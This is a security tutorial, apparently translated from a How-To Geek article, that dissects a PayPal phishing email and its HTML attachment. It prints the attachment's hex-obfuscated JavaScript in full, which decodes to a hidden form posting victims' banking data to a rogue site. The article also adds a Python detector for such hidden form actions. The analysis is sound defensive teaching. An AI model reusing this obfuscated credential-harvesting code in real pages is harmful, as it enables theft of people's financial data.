Online Security: Breaking Down the Anatomy of a Phishing Email

In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.

Don’t think that it’s just your banking details that are important: after all, if someone gains control over your account login they not only know the information contained in that account, but the odds are that same login information may be used on various other accounts. And if they compromise your email account, they can reset all your other passwords.

So in addition to keeping strong and varied passwords, you have to always be on the lookout for bogus emails masquerading as the real thing. While most phishing attempts are amateurish, some are quite convincing, so it is important to understand how to recognize them at surface level as well as how they work under the hood.

Image by asirap

Examining What is in Plain Sight

Our example email, like most phishing attempts, “notifies” you of activity on your PayPal account which would, under normal circumstances, be alarming. So the call to action is to verify/restore your account by submitting just about every piece of personal information you can think of. Again, this is pretty formulaic.

While there certainly are exceptions, pretty much every phishing and scam email is loaded with red flags directly in the message itself. Even if the text is convincing, you can usually find many mistakes littered throughout the message body which indicate the message is not legit.

The Message Body

At first glance, this is one of the better phishing emails I have seen. There are no spelling or grammatical mistakes and the verbiage reads according to what you might expect. However, there are a few red flags you can see when you examine the content a bit more closely.

  • “Paypal” – The correct case is “PayPal” (capital P). You can see both variations are used in the message. Companies are very deliberate with their branding, so it is doubtful something like this would pass the proofing process.
  • “allow ActiveX” – How many times have you seen a legit web based business the size of Paypal use a proprietary component which only works on a single browser, especially when they support multiple browsers? Sure, somewhere out there some company does it, but this is a red flag.
  • “securely.” – Notice how this word does not line up in the margin with the rest of the paragraph text. Even if I stretch the window a bit more, it doesn’t wrap or space correctly.
  • “Paypal !” – The space before the exclamation mark looks awkward. Just another quirk which I am sure would not be in a legit email.
  • “PayPal- Account Update Form.pdf.htm” – Why would Paypal attach a “PDF” especially when they could just link to a page on their site? Additionally, why would they try to disguise an HTML file as a PDF? This is the biggest red flag of them all.

The Message Header

When you take a look at the message header, a couple more red flags appear:

  • The from address is test@test.com.

  • The to address is missing. I did not blank this out; it simply isn’t part of the standard message header. Typically a company which has your name will personalize the email to you.

The Attachment

When I open the attachment, you can immediately see the layout is not correct, as it is missing style information. Again, why would PayPal email an HTML form when they could simply give you a link on their site?

Note: we used Gmail’s built-in HTML attachment viewer for this, but we’d recommend that you DO NOT OPEN attachments from scammers. Never. Ever. They very often contain exploits that will install trojans on your PC to steal your account info.

Scrolling down a bit more you can see that this form asks not only for our PayPal login information, but for banking and credit card information as well. Some of the images are broken.

It is obvious this phishing attempt is going after everything in one swoop.

The Technical Breakdown

While it should be pretty clear based on what is in plain sight that this is a phishing attempt, we are now going to break down the technical makeup of the email and see what we can find.

Information from the Attachment

The first thing to take a look at is the HTML source of the attachment form, which is what submits the data to the bogus site.

When quickly viewing the source, all the links appear valid, as they point to either “paypal.com” or “paypalobjects.com”, which are both legit.

Now we are going to take a look at some basic page information Firefox gathers on the page.

As you can see, some of the graphics are pulled from the domains “blessedtobe.com”, “goodhealthpharmacy.com” and “pic-upload.de” instead of the legit PayPal domains.

Information from the Email Headers

Next we will take a look at the raw email message headers. Gmail makes this available via the Show Original menu option on the message.

Looking at the header information for the original message, you can see this message was composed using Outlook Express 6. I doubt PayPal has someone on staff who sends each of these messages manually via an outdated email client.

Now looking at the routing information, we can see the IP address of both the sender and the relaying mail server.

The “User” IP address is the original sender. Doing a quick lookup on the IP information, we can see the sending IP is in Germany.

And when we look at the relaying mail server’s (mail.itak.at) IP address, we can see this is an ISP based in Austria. I doubt PayPal routes their emails directly through an Austria based ISP when they have a massive server farm which could easily handle this task.

Where Does the Data Go?

So we have clearly determined this is a phishing email and gathered some information about where the message originated from, but what about where your data is sent?

To see this, we have to first save the HTM attachment to our desktop and open it in a text editor. Scrolling through it, everything appears to be in order until we get to a suspicious looking Javascript block.

Breaking out the full source of the last block of Javascript, we see:

<script language="JavaScript" type="text/javascript">
// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i,y,x="3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e";y="";for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>

Anytime you see a large jumbled string of seemingly random letters and numbers embedded in a Javascript block, it is usually something suspicious. Looking at the code, the variable “x” is set to this large string and then decoded into the variable “y”. The final result of variable “y” is then written to the document as HTML.

Since the large string is made of numbers 0-9 and the letters a-f, it is most likely encoded via a simple ASCII to Hex conversion:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Translates to:

<form name="main" id="main" method="post" action="http://www.dexposure.net/bbs/data/verify.php">

It is not a coincidence that this decodes into a valid HTML form tag which sends the results not to PayPal, but to a rogue site.

Additionally, when you view the HTML source of the form, you will see that this form tag is not visible because it is generated dynamically via the Javascript. This is a clever way to hide what the HTML is actually doing if someone were to simply view the generated source of the attachment (as we did earlier) as opposed to opening the attachment directly in a text editor.
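
As an added example (not part of the original article), the following Python routine automates the step just described: it pulls long hex string literals out of the attachment's script blocks, decodes them the same way the phisher's loop does, and reports any form action, visible or hidden, that points outside the legitimate PayPal domains. The sample HTML is constructed for this example, with the hex payload taken from the script block quoted above.

```python
import re
from urllib.parse import urlparse

# Constructed sample attachment: a legitimate-looking link, a decoy form that really
# posts to PayPal, and the hex-encoded document.write() block quoted in the article.
SAMPLE_HTML = """<html><body>
<a href="https://www.paypal.com/">Log in to PayPal</a>
<form name="decoy" method="post" action="https://www.paypal.com/"></form>
<script language="JavaScript" type="text/javascript">
var i,y,x="3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e";y="";for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>
</body></html>"""

# Domains the article identifies as legitimate for this message.
LEGIT_DOMAINS = {"paypal.com", "paypalobjects.com"}

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# A quoted run of 8 or more hex byte pairs: the 0-9/a-f "jumbled string" the article describes.
HEX_LITERAL = re.compile(r"""["']((?:[0-9a-fA-F]{2}){8,})["']""")
FORM_ACTION = re.compile(r"""<form\b[^>]*\baction\s*=\s*["']([^"']+)["']""", re.I)


def decode_hex_literals(html):
    """Return the decoded text of every long hex string literal inside <script> blocks."""
    decoded = []
    for script in SCRIPT_BLOCK.findall(html):
        for literal in HEX_LITERAL.findall(script):
            # Same transform as the phisher's loop: each pair of hex digits becomes one byte.
            decoded.append(bytes.fromhex(literal).decode("latin-1"))
    return decoded


def is_legit(host):
    """True if host is one of the legitimate domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def find_rogue_form_actions(html):
    """Hostnames of form actions, whether written in the HTML or hidden in decoded
    script payloads, that do not belong to the legitimate domains."""
    actions = FORM_ACTION.findall(html)
    for text in decode_hex_literals(html):
        actions.extend(FORM_ACTION.findall(text))
    rogue = []
    for url in actions:
        host = urlparse(url).hostname or ""
        if not is_legit(host):
            rogue.append(host)
    return rogue
```

On the sample, the decoy form is accepted and the hidden form is reported, because the hex payload decodes to a tag posting to www.dexposure.net.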

Running a quick whois on the offending site, we can see this is a domain hosted at a popular web host, 1and1.

What stands out is the domain uses a readable name (as opposed to something like “dfh3sjhskjhw.net”) and the domain has been registered for 4 years. Because of this, I believe this domain was hijacked and used as a pawn in this phishing attempt.

Cynicism is a Good Defense

When it comes to staying safe online, it never hurts to have a good bit of cynicism.

While I am sure there are more red flags in the example email, what we have pointed out above are indicators we saw after just a few minutes of examination. Hypothetically, if the surface level of the email mimicked its legitimate counterpart 100%, the technical analysis would still reveal its true nature. This is why it is important to be able to examine both what you can and cannot see.

Translated from: https://www.howtogeek.com/58642/online-security-breaking-down-the-anatomy-of-a-phishing-email/